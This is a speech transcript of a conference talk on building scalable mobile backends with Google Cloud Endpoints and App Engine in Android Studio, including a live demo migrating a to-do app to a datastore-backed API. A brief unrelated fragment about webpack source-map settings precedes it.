number of the available source map tools, I landed on this configuration:
// webpack.config.js { devtool: isProd ? 'source-map' : 'cheap-module-inline-source-map', }
webpack documentation recommends a full, separate source map for production, so
we're using
source-map in production as it fits the bill. In development, we
use
cheap-module-inline-source-map. It was the fastest option that still gave
me consistently accurate, useful file and line references on errors and during
source code lookup in the browser.
Journey Still Going (Real Strong)
At this point, I'm still no expert in webpack and its many available loaders/plugins, but I at least know enough to be dangerous -- dangerous enough to slay those incremental build times, am i rite?
| https://www.viget.com/articles/unpacking-the-mysteries-of-webpack-a-novices-journey/ | CC-MAIN-2019-51 | refinedweb | 1,659 | 56.15 |
Bummer! This is just a preview. You need to be signed in with a Pro account to view the entire video.
A Guide to Simplicity: Creating Web Backends for Web and Mobile Clients48:40 with Laurence Moroney
Laurence Moroney, from Google, shows you how to build scalable cloud services for your mobile applications, then steps you through how to automatically create proxy classes for these services that run in browsers, on iOS devices and of course, on Android. He'll cover what's needed to go from start to finish -- building a service and then building the clients for it, using Android Studio & Cloud Endpoints-- both freely available tools.
- 0:01
Okay everybody thanks for coming and, welcome to Future
- 0:04
Insights Live, you guys having a good conference so far?
- 0:07
Yeah, yeah?
- 0:08
Enjoying Vegas?
- 0:10
Looking forward to the party tonight, or you gonna skip off and do Vegas instead?
- 0:13
[LAUGH] I see a lot of nods.
- 0:17
[LAUGH] So my name is Lawrence Maroney, I'm from Google, and I
- 0:21
work as a developer advocate in Google I focus primarily on Cloud.
- 0:26
In Google so technology such as Google App
- 0:29
Engine, Google Compute Engine, that type of stuff.
- 0:31
I also do a lot of work in building mo, building back ends
- 0:35
for mobile clients using a technology that we have called Google Cloud Endpoints.
- 0:39
And I'm gonna be talking a little bit about that today.
- 0:42
And how, we have designed the tooling, particularly in Android Studio,
- 0:46
to make it very simple for developers to build scalable back ends.
- 0:51
Not just for Android clients, but also for iOS clients, for web
- 0:54
clients, and if you wanna build like Windows mobile or desktop clients
- 0:57
or something like that, you can use the same technology as well,
- 1:00
but to be frank, our focus has been on Android, iOS, and web.
- 1:04
So, just to give a quick rundown of the
- 1:06
things that we'll be talking about today overview is
- 1:09
gonna talk a little bit about Android studio and
- 1:12
Cloud endpoints and how Cloud endpoints work within Android studio.
- 1:15
I know everybody hates a product page, so I'm
- 1:17
gonna avoid the product page as much as possible.
- 1:20
But I will talk through some of the features.
- 1:21
Particularly some of the ones that I'm gonna be showing.
- 1:23
I'll then be spending the bulk of my time on taking an existing
- 1:27
Android App, and it's a very popular App in the Android Play Store.
- 1:32
And it just fortunately happens to also be open sourced, and producers
- 1:37
of this App gave us permission to take the open source of this
- 1:39
App and to change it's back end from using a Dropbox based back
- 1:43
end to using a Cloud end point and Google Cloud based back end.
- 1:48
We can then talk a bit about future directions, where we are going.
- 1:51
As you may know we have a Google IO is next week,
- 1:53
so our big conference is next week why with a lot of announcements.
- 1:56
I can't pre announce anything from that, but
- 1:58
I can talk a little bit about where we're
- 1:59
going with some this stuff, and then we'll have some time for Q and A at the end.
- 2:03
All right, so first of all, let's take a look at Android Studio and
- 2:06
let's take a look at some of the, the Google Cloud endpoints and the technology.
- 2:09
But first question for anybody, how many people here are mobile developers?
- 2:13
Okay and how many of you are Android mobile developers?
- 2:17
Okay, pretty much the same.
- 2:18
Now do you guys build natively for Android using Java
- 2:21
or do you prefer to use something like a phone gap?
- 2:23
So native folks first.
- 2:26
Okay and then the folks that use some kind of cross platform like a phone gap.
- 2:30
Okay so about 60, 30 or 60, 40 in favor of the phone gap folks, okay.
- 2:34
So I'm gonna be talking primarily about the native stuff here and
- 2:38
the tool that we have called Android Studio is a free tool.
- 2:41
And, it's an already access preview and it can be downloaded
- 2:44
from the really small URL you can see in the corner there.
- 2:47
It's just developer.android.com.
- 2:49
Now we built this to take the best of IntelliJ, and the reason for
- 2:53
this is there's lots of great features in IntelliJ that we like to use.
- 2:56
Some of the things like the build system, the linting tools
- 3:01
the full IDE, and the ability to have plugins in your
- 3:04
iDE so that, we can turn this into a tool not
- 3:07
just for building client applications but also for building Cloud back ends.
- 3:10
And I'll be demonstrating some of those in a moment.
- 3:13
But the idea is, like, we wanted to, you know, present this to you
- 3:15
guys as a holistic way of building an Android application with a Cloud back end.
- 3:19
And then that Cloud back end can also be extended.
- 3:22
So if you wanna use Xcode or if you wanna
- 3:24
use PhoneGap or something like that to build for other platforms.
- 3:29
So Cloud end points, has anybody
- 3:31
used Cloud endpoints, anybody familiar with them?
- 3:34
Nobody, one okay good.
- 3:35
So the idea behind Cloud endpoints is I just wanna take a step
- 3:40
back for a second and think about how do we build mobile applications.
- 3:45
Now a recent survey that we saw said that 87%
- 3:49
of mobile applications require some kind of web or Cloud
- 3:53
back end and of those 87, about three quarters of
- 3:57
them primarily use that back end just for CRUD data.
- 4:00
They just use it for storing data.
- 4:02
So, create, retrieve, update and delete of data.
- 4:04
So, about a quarter of them actually have just, business logic on the backend.
- 4:09
So, mobile applications, we see from the trend, is primarily, back ends for these.
- 4:14
It's about storing data, and it's about retrieving data,
- 4:16
and it's about keeping it simple and keeping it light.
- 4:18
Now if you're using a web technology for this and you're managing
- 4:22
your own server farms and you're managing all of this kind of stuff.
- 4:26
You've, taking a lot of, a lot of investment on to be able to manage
- 4:30
all of these machines to do a very simple task, which is just crud data.
- 4:33
So that's the first thing we think, if you
- 4:36
start working with a Cloud vendor such as ourselves
- 4:38
or Microsoft or Amazon or any of the others
- 4:40
who offer particularly a platform as a service offering,
- 4:43
you can take advantage of the fact that they
- 4:46
manage all of the plumbing for you, they manage
- 4:47
all of the infrastructure for you and you can
- 4:50
just focus on building your code, that's part number one.
- 4:52
Part number two then comes to scale, now.
- 4:55
It's a great problem to have if
- 4:57
your application suddenly goes through the roof.
- 4:59
If you have a Superbowl moment.
- 5:00
And instead of 1,000 people using your application a month, you have 1,000, 000.
- 5:04
Or you have 10, 000, 000.
- 5:05
Or something like that.
- 5:06
How do you manage that type of scale?
- 5:08
Now, the reason why I like App Engine and why I joined Google to work on
- 5:11
App Engine, was I find it's the best
- 5:13
technology for rapid scaling that you can find.
- 5:16
I'm gonna give one example of an application that
- 5:19
I worked on and a project that I worked on.
- 5:21
That there's a there's a very famous boy band
- 5:24
who's anybody here like boy bands, out of interest?
- 5:29
Distinct no show of hands.
- 5:30
There's a very famous boy band called One
- 5:31
Direction, I'm sure guys have heard of them
- 5:33
and anybody who has a daughter has probably
- 5:35
heard of them and back in November they
- 5:38
launched a new record and for this new
- 5:40
record they did this seven hour live stream
- 5:43
and if you know anything about this band,
- 5:44
one of the things that's really cool about them.
- 5:46
Is that they're just a bunch of goofballs.
- 5:48
They like to just do crazy, stupid, silly things.
- 5:50
[SOUND] Okay, I'll just hold it.
- 5:55
So as I was saying, so the band, they like to
- 5:57
do these crazy, silly, stupid things, and so for this seven
- 6:00
hour live stream, they wanted to try to break like some
- 6:02
world records, like stacking toilet rolls as high as you could.
- 6:05
The world record for stacked toilet rolls apparently is 27.
- 6:08
So they tried to beat that and do all this on a YouTube live stream.
- 6:12
Now where does this fit into Cloud?
- 6:13
So, one of the things the, the record company for the band
- 6:16
wanted to do was to have a, a second screen application where fans
- 6:19
of the band can interact with the band using this second screen
- 6:23
application and one of the things they had in this was a quiz.
- 6:26
And then the interesting thing about having a
- 6:27
quiz was that the band every ten minutes on
- 6:30
this live stream would say, okay go to
- 6:32
the second screen application now and answer a question.
- 6:35
And, at peak we had about 750,000 concurrent viewers of this.
- 6:40
So if you can imagine your web
- 6:41
application, you're gonna have zero, zero, zero
- 6:44
traffic on the quiz, until the band says go and answer a question now.
- 6:48
And there was like motivation, there was
- 6:49
incentives to do that whoever had the highest
- 6:51
score in questions could, meet the band via
- 6:53
a Google Hangout and that kind of thing.
- 6:55
So you'd have zero traffic on your website.
- 6:58
You'd have zero traffic on your mobile App,
- 7:00
until the band says go and answer this question.
- 7:02
And you'd go from nothing, to three quarters of a million in like ten seconds.
- 7:06
And so you can just imaging the scaling,
- 7:08
problems you would have with doing something like that.
- 7:11
So having a platform as a service back end, we build something, we used
- 7:15
a PHP and we used Python, to build this back end, use that engine.
- 7:19
Use a bunch of technologies, such as [UNKNOWN] cash, instead
- 7:21
of data storing, to make this as fast as possible.
- 7:24
So that we could have these huge spikes.
- 7:26
We could handle these huge spikes, so we'd have no dropped traffic.
- 7:29
And then as soon as the people have
- 7:30
answered the question, they're dropping off the App.
- 7:33
They're back onto watching the mobiles.
- 7:34
They're back onto watching the, the video stream.
- 7:37
So, imagine you got no traffic.
- 7:38
Huge spike, no traffic for ten minutes, huge spike.
- 7:42
And you wanna build an App that's responsive for that.
- 7:44
So Cloud end points are the way that the back end of this
- 7:47
was able to do this and then the front end for the, for
- 7:50
the mobile App, for the web based App for the quiz, you know
- 7:52
that people would have on their second screen were able to do that.
- 7:55
So that's why I always advocate when you think about when you
- 7:57
wanna build something, advocate building as a Cloud based back end, as
- 8:01
opposed to a web based back end, cuz you get the ability
- 8:03
to scale right up and the ability to scale right back down again.
- 8:07
And you're only paying for the traffic that your using.
- 8:09
You're only paying for those spikes.
- 8:10
So this thing ran for seven hours.
- 8:12
We had peak of three quarters of a million people using it and at peak this thing
- 8:17
actually had, the App itself, had more people using
- 8:20
it than google.co.uk which I thought was really cool.
- 8:23
How much do you think it costs in cloud cost to run something like that?
- 8:27
Can anybody warrant a guess?
- 8:30
Thousands, hundreds of thousands.
- 8:33
I, I, I, I, I, I can't actually tell you the figure, but what I will tell
- 8:36
you is that three of us went out for
- 8:37
a few drinks after the thing was delivered successfully.
- 8:39
And we didn't drink a lot but our drinks
- 8:41
bill was actually bigger than the cost of running this
- 8:43
and to me that's, that's the definition of success
- 8:45
if you're a software architect, that you know, you can
- 8:48
manage to keep your costs lower than your drinks
- 8:50
bill, so, to talk about Cloud endpoints and how we
- 8:52
did this, the idea is that we have a, it's a very simple way to build a server logic.
- 8:57
So it can be consumed by web clients.
- 9:00
It can be consumed by mobile clients.
- 9:02
And then it uses the auto-scaling that I was talking about, the high
- 9:05
availability that I was talking about and the App Engine actually gives to you.
- 9:10
And if you're using tooling like Android Studio, it then gives you strongly typed,
- 9:14
mobile optimized clients for the, the mobile,
- 9:17
like I mentioned Android iOS and web.
- 9:19
And then if you just wanna use like any
- 9:21
other client or if you just wanna build a website
- 9:22
around it, then it does expose standard base rest
- 9:25
interfaces and you can have built in authorization from that.
- 9:29
So, to take a look at this is roughly what
- 9:31
an application would look like if you build it this way.
- 9:33
So, you use an App Engine or you use your platform as a service which is on
- 9:37
the right of the diagram here and you build
- 9:39
your mobile App, mobile back end running on that.
- 9:42
Then, you expose that back engines and Cloud end points and then
- 9:45
you have Cloud end point clients for iOS web Android and the like.
- 9:50
Now the idea between these endpoint clients is
- 9:51
that these are actually automatically generated for you,
- 9:54
based on meta data that use specified for you in the cold in the back end.
- 9:58
I know there's a lot of concepts coming hard and fast, but I'll be
- 10:01
demoing this and I'll be building an
- 10:02
application shortly that shows all of this.
- 10:06
Now the idea is, well as it takes the complexity out of it.
- 10:08
So if you were just thinking about building a back end, and then you want to
- 10:11
expose that back end to an iOS client, yes you could build a rest interface for that.
- 10:15
But then when you sit down in Xcode and you start trying to consume that rest
- 10:18
interface, you've got to build the libraries within
- 10:21
your Xcode with, in Objective C or Swift.
- 10:24
I haven't tried it with Swift yet, I've only tried it
- 10:26
with Objective C, to be able to access your back end.
- 10:28
Did it with Android if you were.
- 10:30
You'd have to build Java library to be able
- 10:32
to access it, if you're a windows phone developer you'd
- 10:34
have to build C sharp libraries to be able
- 10:36
able to access it or VB.net libraries to be able
- 10:38
to do it, and Ditto if you're a web
- 10:39
developer you'd have to build some sort of JavaScript libraries
- 10:42
to do that, so we said what if we do
- 10:44
this, what if we approach this in a different way?
- 10:46
What if we build our back ends, we build them running on App Engine?
- 10:50
We attribute these back ends with various tags,
- 10:53
that we then create a service that looks
- 10:55
at these tags, and says, this is a method, this is an API, this is a parameter.
- 10:59
That type of thing, and uses those tags to automatically generate, those
- 11:03
end points those endpoint clients that are tailored to your specific App.
- 11:08
And that's what this is all about, that's what Cloud end points are all about.
- 11:12
And then of course it takes some of the risk out of it, think about all those
- 11:14
scenarios that I was talking about, where you'd
- 11:16
have to build your own clients and objectivity with
- 11:19
Java or something like that, then you've got
- 11:21
to implement security, so if you're implementing security, think
- 11:24
of the complexity of code you'd have to
- 11:26
write in those to access that secured end point.
- 11:29
Again the is using all those attributes we
- 11:32
were talking about, we're generating those classes for you.
- 11:35
So, Android Studio Cloud end points, our aim is to make it the easiest way that
- 11:40
mobile developers can connect to a back end
- 11:43
running on the Google Cloud platform, it's all
- 11:45
about building the java specific bindings that I
- 11:47
spoke about for Android developers, objective C for
- 11:50
iOS developers etcetera, but when you use android
- 11:52
studio now there's a lot of other goodies.
- 11:54
Based on IntelliJ, and if any, if anybody's used
- 11:57
IntelliJ, there's lots of great goodies that comes along.
- 11:59
Including things such as Azure type validations.
- 12:02
Now, at Google, we have a very strict
- 12:06
coding style that everybody has to adhere to.
- 12:09
And there's a tool called a linter.
- 12:11
And what the linter does is if I'm writing code
- 12:13
and I'm checking it into the system, and I do
- 12:15
things in my code that are out of style, that
- 12:17
break style, then the linter will go and let me know.
- 12:20
So for example, if I start an API with a dot.
- 12:23
Like dot get tasks or something like that, that actually breaks the IL.
- 12:26
And the lending tool within Google takes a
- 12:29
look at the style, says that I've done that
- 12:31
and i have to fix my code before I can check it in and do continuous integration.
- 12:34
So, a lot of companies do that type of thing.
- 12:36
A lot of folks may want to do that kind of thing.
- 12:38
But, enforcing style by having peer review is difficult
- 12:42
but if the tools can help you enforce style so
- 12:44
that they give you a, a red wiggily underline
- 12:46
in your code if you're broken style that's really useful.
- 12:48
So with an Android studio, you've got the ability to define
- 12:52
the styles that you want your protos to have, and then
- 12:55
when the coders don't follow those styles, then they get a
- 12:58
warning as they are editing or as they try to compile.
- 13:01
[SOUND] Okay, so let's just get straight to the demo instead of talking
- 13:05
about concepts and, what I'm gonna do is add a Cloud back end to
- 13:08
an Android App, so, any Android users, if you have the Play store you
- 13:12
can go open it and take a look at this App It's called Todo.txt.
- 13:16
It costs two dollars to download it, it's a very simple
- 13:19
to do application, it was written by a third party so it
- 13:22
wasn't written by us and very, very popular you can see if
- 13:25
you look at the Play store it's got lots of positive reviews.
- 13:29
But what's really nice about it other than the positive reviews,
- 13:32
what's really nice about it, is that it's completely open source.
- 13:35
So we said okay, instead of like.
- 13:38
Coming up with some rough concept to kind
- 13:40
of show off our thing which isn't realistic.
- 13:42
We said why don't we take a good application like this
- 13:44
that people love, that's very popular, and see if, how difficult
- 13:48
would it be, to turn this from using a Dropbox, Dropbox
- 13:52
based back end, to a Google Cloud end points based back end.
- 13:56
So that's exactly what I'm gonna show.
- 13:58
So, this is the architecture of what it would look like.
- 14:00
So on the left, we have the actual application itself.
- 14:04
So the application itself is an Android application and this is what it
- 14:08
looks like today where it's just using Dropbox right, without the back end stuff.
- 14:12
Simple application, it writes a file to the file
- 14:15
system and then Dropbox being a file based thing.
- 14:18
Allows them to just store that file in Dropbox, and
- 14:20
then when you open the application again retrieve it from Dropbox.
- 14:23
And your to do text, your to do list is within that file.
- 14:27
So we say, okay, what if you're building something like this for the Cloud?
- 14:30
Well, the idea of the Cloud then, is that first
- 14:32
you're gonna have to build your back end for this.
- 14:34
Now I'm gonna build a simple CRUD based back end to replicate what they
- 14:37
were doing, a Dropbox where I can store a file, and I can read the
- 14:41
file, and I can read my tasks from within that file, and then I wrap
- 14:44
that with a Cloud endpoint that would allow any of my clients to access it.
- 14:48
Of course then I also, I'm gonna use a data store, so then once
- 14:52
I, instead of storing a file in the Cloud, I say okay, let's do
- 14:54
this like the way I were first building in the real Cloud application, and
- 14:57
I'm gonna take all the tasks, and I'm gonna store them in a database.
- 15:00
In this case.
- 15:01
We have a no SQL style database called Cloud
- 15:03
data store, and I'm gonna be using that one.
- 15:05
And then finally, there's the interface between
- 15:08
the end points and the application itself.
- 15:10
So, I've defined my Cloud end points, I'll generate the
- 15:13
clients libraries, and then I'll start using those client libraries in
- 15:17
the to do text App instead of you know the, the
- 15:21
file based stuff that was there for Dropbox to begin with.
- 15:24
All right, so let me switch to the demo and let me switch to Android studio.
- 15:31
So I just need to move some stuff around here since my mic.
- 15:34
[INAUDIBLE] okay.
- 15:39
Oops.
- 15:42
So in, this is Android Studio.
- 15:44
And in Android Studio I have opened up, you can, can you guys read the code okay?
- 15:48
I have a nice big font, hopefully it's okay.
- 15:51
So in Android Studio I have opened up the the todo.txt application itself so.
- 15:57
Within the todo, todo.txt application, there are
- 16:00
a number of components that it uses.
- 16:02
There's like a, you know, from slide into refresh, an
- 16:05
all those kind of application, all, all those kind of components.
- 16:07
So each one of these has a build file associated with it.
- 16:10
Anybody familiar with Gradle?
- 16:13
Okay, so you guys know all about Gradle so that's good.
- 16:15
So Gradle is just basically a build system and it allows us to synchronize building.
- 16:19
Each of the sub components along with building of the main component.
- 16:24
Of the main application itself.
- 16:25
So if I then come within here, and I take a look at within
- 16:29
todo.txt, touch here I can see the build upgrader for the actual file itself.
- 16:35
And here are the dependencies, so the
- 16:37
dependencies are a number the components, including this
- 16:39
spectacularly named Chuck B Jones swiped to dismiss undo list and so these were a
- 16:44
third party component that the original App
- 16:46
developer had brought in an the greater build
- 16:49
file allows me to add to just to find them within my main project itself.
- 16:54
Now I'm gonna be configuring that later to pull
- 16:56
in the components that I'm going to be generating here.
- 16:59
So, let me just open up something here.
- 17:04
Okay so, next up within Android studio we have
- 17:09
the Cloud tools that allow us to define endpoints.
- 17:12
Sorry I'm.
- 17:13
My stage is a little crowded so so if I come into tools and
- 17:19
through these Google Cloud tools and there's
- 17:21
something allows me to generate an endpoint.
- 17:24
So if I said, oops, [SOUND] my microphone keeps getting in the way.
- 17:32
So I'm gonna come up here and try this again.
- 17:36
Tools, Google Cloud tools, and I'm gonna add an App Engine back end.
- 17:43
So, I haven't created anything in App Engine yet,
- 17:47
I haven't touched anything in Google Cloud so, what's included
- 17:50
here is a simulator for the Google Cloud App engine
- 17:53
run time and I'm gonna add an endpoint for that.
- 17:55
There are a number of different ways I could do it.
- 17:57
There is java endpoint modules.
- 17:58
There is Java servlet module, that kind of thing.
- 18:01
But I'm gonna do it as a Java endpoints module.
- 18:03
Let me just rearrange something here quickly, so I could see.
- 18:08
All right and, I'm gonna call this, it's the application's called to do TXT.
- 18:12
So I'm gonna call my back end the to do txt back end.
- 18:15
And then, I'm just gonna put that in the name com.google.todo.txt.backend.
- 18:20
[SOUND] And then I'm gonna generate that.
- 18:24
So now it's just generating a basic back end for me.
- 18:27
Now, one of the things we're using Gradle is
- 18:29
that I've got lots of Gradle files in this project.
- 18:32
I've got for each components.
- 18:33
I've got for the back ends.
- 18:34
I've got for the, for the client app itself.
- 18:36
So.
- 18:37
Sometimes it starts trying to build things where before those have been
- 18:40
updated, and that's why I got that red error at the bottom.
- 18:43
But it's okay.
- 18:43
It's it just takes a little while for them
- 18:46
all to get synched up and then it will work.
- 18:48
And so, but if I look at the code
- 18:49
that I've generated now, I have my todo.txt back end.
- 18:53
And if I go in here and I take a look at my Java code.
- 18:56
Very, very simple Java Code.
- 18:57
It's just a plain old Java object that's been created for me.
- 19:00
That contains a string and a getter and a setter for that string.
- 19:03
And then the interesting thing is the end point itself.
- 19:06
So, if I open this end point.
- 19:08
First of all, there is a number of things I can view.
- 19:09
If you look at the, the yellow one.
- 19:10
So, the syntax coloring here, I've just defined, yellow
- 19:13
to be the attributes for back, for the Cloud.
- 19:17
endpoints.
- 19:18
So, you see I have an @API attribute, and, so that's just defining that this is
- 19:22
an API that I want to build, so, when I build this code, App Engine itself will
- 19:27
have this defined as an API, when I point the tools at it to say generate client
- 19:32
classes to access my API for me, it's
- 19:34
gonna be using this attribute to pull that out.
- 19:37
There's an API name space, but the important ones
- 19:39
I wanna look at here, are the API method.
- 19:41
So you see have generated, the tool has generated a method for
- 19:45
me that I'm calling to say hi, and then it's returning a beam
- 19:48
called my beam which is just this one that we showed a
- 19:50
moment ago which has the data, the getter, and the setter for that.
- 19:54
And then the method itself I'm gonna call it say
- 19:56
hi, and I'm gonna take a parameter that I call name.
- 19:59
This is really basic, very, very elementary stuff.
- 20:02
But it's just creating an, an elementary endpoint for me.
- 20:06
So, why don't I go ahead and run that, and let's see what it looks like.
- 20:09
So I'm just gonna change my profile to the backend and run it.
- 20:11
[SOUND] And switch into my
- 20:17
browser, when it runs.
- 20:23
So, we see the scrolling on the left here, it shows my dev app server's now running.
- 20:28
So I'm gonna come in here and I'm just gonna go, it runs on local host 8080.
- 20:31
And then I'm gonna take a look and this is just that basic app that written for me.
- 20:36
But I wrote an endpoint and I wrote an API with that endpoint.
- 20:39
So how do I access that endpoint?
- 20:40
How do I access that API?
- 20:42
Well there's a, if you post fix it with understoryh/API/explorer.
- 20:46
It does a little bit of magic and what that does is that
- 20:49
if you're familiar with app engine app
- 20:52
engine applications run on something that appspot.com.
- 20:56
So we've pre-written this application called
- 20:59
APIs Explorer, which is running on apisexplorer.appspot.com.
- 21:03
So when I browsed into my local API, but I used that post fix on the end
- 21:08
of it, what's happening is the application on
- 21:10
APIs Explorer going, taking a look at my metadata.
- 21:13
Parsing that out and building a web client for me.
- 21:16
So this is my web client, and remember if, when I had the
- 21:18
attribute I called the API my API, which is why it's called that here.
- 21:23
And if you remember I had my method, I called it say hi,
- 21:25
which is what, so I clicked that and that's why it's called here.
- 21:28
And I'll just come in and say, I don't know, future insights and execute it.
- 21:34
So now you can see it's just doing a post to my local host on
- 21:38
this sorry let me see if I can zoom in, that is a little small.
- 21:43
Anybody remember how to zoom in Chrome, I can never remember how.
- 21:45
There we go.
- 21:47
Yeah.
- 21:47
All
- 21:50
right, let's see if that looks a little better.
- 21:54
Okay, so you can see I just did a post to
- 21:56
my endpoints, and then I got the response back, high future insights.
- 22:00
So this is the server running on my local machine right
- 22:03
now, that very, very simple API that I had defined, and the
- 22:06
cloud endpoint for that API having client libraries for a web client
- 22:11
being generated for, and then this API Explorer talking through those endpoints.
- 22:15
If I go back to my code, you'll see that it was
- 22:18
a very simple hello world so, you know, it's taking in a string
- 22:21
name, I passed in future insights, it's generating a bean from that and
- 22:26
it's just setting the data to be high name and then returning that.
- 22:30
And you will see that the API endpoint was called say hi, so.
- 22:34
Very simple example that's just a hello world kind of
- 22:37
thing, but there's a whole lot of infrastructure underlying this.
- 22:40
And this kind of infrastructures, what you
- 22:41
can build to have your more scalable applications.
- 22:44
So now let's wa, but what we're doing here is we're
- 22:46
taking this todo.txt application and we're rebuilding that for the cloud backend.
- 22:50
So let me start doing that.
- 22:51
So first of all.
- 22:52
Instead of just using [UNKNOWN] I'm gonna refactor it.
- 22:56
So refactoring tools if you are a
- 22:58
Java developer are absolutely priceless, because Java has
- 23:01
some constraints like your class name has
- 23:03
to have the same filename et cetera [INAUDIBLE].
- 23:05
So if I have a bean called task bean.
- 23:07
So, I just going to refactor it so you can see over here
- 23:11
I know it's a little small that is was renamed to task B.
- 23:16
And then I'm just gonna add some code to this, so every task needs an id.
- 23:21
So I'm gonna add a private long id to this and
- 23:28
you need a getter and setter for this, and some of the
- 23:30
things I like about the tools is that there's like some generation
- 23:32
on here, so I just right click on my id, say Generate.
- 23:36
Ask for the getter and setter I say, id long, and
- 23:38
then the getter and setter have been generated for me on there.
- 23:41
Just a nice little shortcut if you're coding these kinds of things.
- 23:44
Now it might be, and I've got an id and I've got a string on
- 23:46
it, so that's good enough for my task, but I need to change my endpoint, right.
- 23:50
This endpoint that says, it, says, that just says, hi,
- 23:54
is no good for actually building a my, for rebuilding mytodo.txt.
- 23:58
So I'm going to cheat a little bit.
- 24:00
Instead of having you watch me type all the code.
- 24:03
I have little macro, so I pre, one of the things again, with the tools,
- 24:07
you can pre-define macro, so I have a macro that I call App Engine Task.
- 24:10
When I start, when I type in that macro what it does
- 24:13
is just, just paste the code that I had typed earlier on.
- 24:15
So what this has is, there are three methods.
- 24:18
One for storing a task in the cloud.
- 24:20
One for getting all my tasks out of the cloud,
- 24:22
and one for clearing the tasks that are actually there.
- 24:24
Now you'll notice that when I put this code in, the word, there's a number
- 24:28
of code words here that are being highlighted
- 24:31
in red such as entity and set property.
- 24:33
So the nice thing about the tools here is
- 24:35
that they will try to automatically do imports for you.
- 24:38
So as you start typing a code, if it recognizes, for example,
- 24:41
datastore service, it will add the correct import for me for datastore service.
- 24:46
But the problem with that of course is if you got
- 24:48
multiple imports that it recognizes that matches the keyword, in this
- 24:52
case entity, it says, I don't know what to import for
- 24:54
this, so it highlights it in red, just so that you know.
- 24:57
So I just wanna go through and fix some of these.
- 24:59
So if I.
- 25:00
I'm doing command one on this and then it's saying,
- 25:02
hey look, you know, you probably want to import this class.
- 25:05
So I import the class.
- 25:06
And then it's gonna tell me it's found all of these different entities.
- 25:09
Which one should I use?
- 25:10
Well, I just happen to know that the
- 25:12
one that I wanna use is the appengine.api.datastore.entity.
- 25:16
So I'm gonna go ahead and use that one.
- 25:17
And then just scroll down through my code and just make sure I've got all of them.
- 25:20
You can see list here and so list, I believe I want is a java.util list.
- 25:26
So I'm gonna come in here and say java.util lists, for my query.
- 25:30
I'm querying from an app engine datastore, so I'm just going
- 25:34
to, whoops, I'm just gonna import the app engine datastore query.
- 25:37
Where's that.
- 25:40
This one and in my Fetch options should be
- 25:43
my last one and that's also the datastore Fetch options
- 25:46
so, I'm holding down command, hitting one just to get
- 25:49
this menu and I'm gonna use the datastore Fetch options.
- 25:52
So now I know all my code is good, all my imports have been resolved.
- 25:55
So let's take a quick look at the code.
- 25:57
For just sorting this data in the cloud.
- 25:59
Okay, so first of all, I have a method that I call store task.
- 26:04
Which is in my todo.txt, my todo.txt app, I create a task.
- 26:08
And then I wanna store that task in the cloud for later retrieval.
- 26:11
So how do I store that?
- 26:12
First of all, I'm just creating a datastore service.
- 26:15
Datastore, cloud datastore, is a no sequel based data
- 26:18
storage system that comes as part of Google Cloud.
- 26:21
So just the API for that is in a datastore service.
- 26:24
I'm creating a transaction, and then on
- 26:26
that transaction I have to, store an entity.
- 26:30
So, when you store something in datastore, you don't store just a pure
- 26:33
string, or a pure int or a pure [UNKNOWN] or something like that.
- 26:36
You create an entity, that entity then has name value pairs
- 26:40
for your data and then you store that entity within the datastore.
- 26:43
So I'm just creating an entity here that I'm calling a
- 26:46
task bean and the entity's id is just gonna be the same
- 26:49
as the id of the task and then I've only got
- 26:52
one property on my task and that's the string defining the task.
- 26:55
And on the task entity I'm just gonna set name value pair.
- 26:58
I'm just gonna call it data and I'm gonna set it
- 27:01
to be the data from the actual bean, from the task bean.
- 27:04
And if you remember the task bean was just this guy, where I just had
- 27:07
a lung and I had a string and I had getters and setters for them.
- 27:10
So very straight forward that I just.
- 27:13
Create a handle on my datastore.
- 27:15
I create an entity to store in that datastore and then I set up that
- 27:19
entity with the details for the task that I want to store in the datastore.
- 27:22
And then I just store it in and it's in a transaction so I commit it, I use a
- 27:26
.put to store the entity and because it's a transaction
- 27:29
if something goes wrong I can always roll it back.
- 27:30
So pretty straightforward.
- 27:32
So now the next thing.
- 27:33
Well, first of all, wait a second.
- 27:34
I've got a red underline.
- 27:35
I don't know how well you can see it on the screen on .gettasks.
- 27:38
So usually red underlines indicating some kind of an
- 27:41
error and this tooltip, I'm sorry, is really tiny.
- 27:43
But this is the [INAUDIBLE] going on that I was talking about.
- 27:45
It's telling me that I shouldn't prefix APIs with a dot.
- 27:50
So because otherwise when I'm calling it, I
- 27:52
might be calling client..gettasks which would be wrong.
- 27:55
So I'm just going to get rid of that dot, and then the [UNKNOWN] goes away.
- 27:58
So it's just checking my code styling, making sure I'm doing things right.
- 28:02
And it goes away, and it allows me to continue.
- 28:04
So now the next thing is I've stored all these tasks, one by one.
- 28:08
And when I launch my app, I might want
- 28:09
to see all the tasks that are available to me.
- 28:12
Usually if I wanna look at my to do list, I wanna see everything on my to do list.
- 28:15
So this is very similar code to what we just saw.
- 28:17
I have a datastore service.
- 28:19
I have, I'm creating a key into this datastore
- 28:22
service and then I'm querying it based on that key.
- 28:25
Now when you query a, a datastore, you don't
- 28:27
use sequel because it's a no sequel style database.
- 28:30
So but if I create a query and I'd specified the entities that
- 28:34
I want in that query, and I provide no further parameters, I get everything.
- 28:38
And that's because here I just wanna get everything and creating that key.
- 28:42
And on the datastore service, I'm just saying.
- 28:45
Prepare that query, give me everything in that query and send it back as a list.
- 28:49
That list then gets loaded into a list of entity, and
- 28:52
then I, remember entity is how we store things in datastore
- 28:56
but our client is using task beans, so I now want
- 28:59
to turn that list of entities into a list of task beans.
- 29:03
So I create an array list of task beans and
- 29:05
then I just cycle through my entities, reading out the id.
- 29:08
Reading out the data and then setting them on the appropriate task bean.
- 29:12
So, remember the data storage just uses entities.
- 29:14
I don't store my beans directly and that why I just
- 29:16
gotta do this kinda, translation tier in between the two of them,
- 29:20
read out all the entities, get the data from those entities,
- 29:22
use that to create task beans and then return those task beans.
- 29:26
And then finally I have clear tasks which is just to
- 29:30
get rid of everything, to wipe out my my data store,
- 29:33
and it's the same kind of thing I'm just gonna query
- 29:35
everything and then go through everything and delete them one by one.
- 29:39
So if I have 20 tasks in there it's just gonna give me back this list of entity of
- 29:43
results, we'll have all 20 of them and then
- 29:44
I just cycle through and delete them one by one.
- 29:46
And then put that into a transaction and then off we go.
- 29:50
Okay.
- 29:50
So shall I run this and let's see what it looks like.
- 29:54
So if I run this backend now.
- 29:57
I just get this warning cuz I was already running something on
- 30:00
my local server, so I'm just gonna say stop it and rerun it.
- 30:03
And then give that a moment to run.
- 30:04
[BLANK_AUDIO]
- 30:10
Is it running?
- 30:12
Hit
- 30:15
C, switch back to Chrome and I'll say, localhost
- 30:18
8080 again and I'll go to the AHPI Explorer.
- 30:25
Oops.
- 30:25
Not running yet.
- 30:32
Hm.
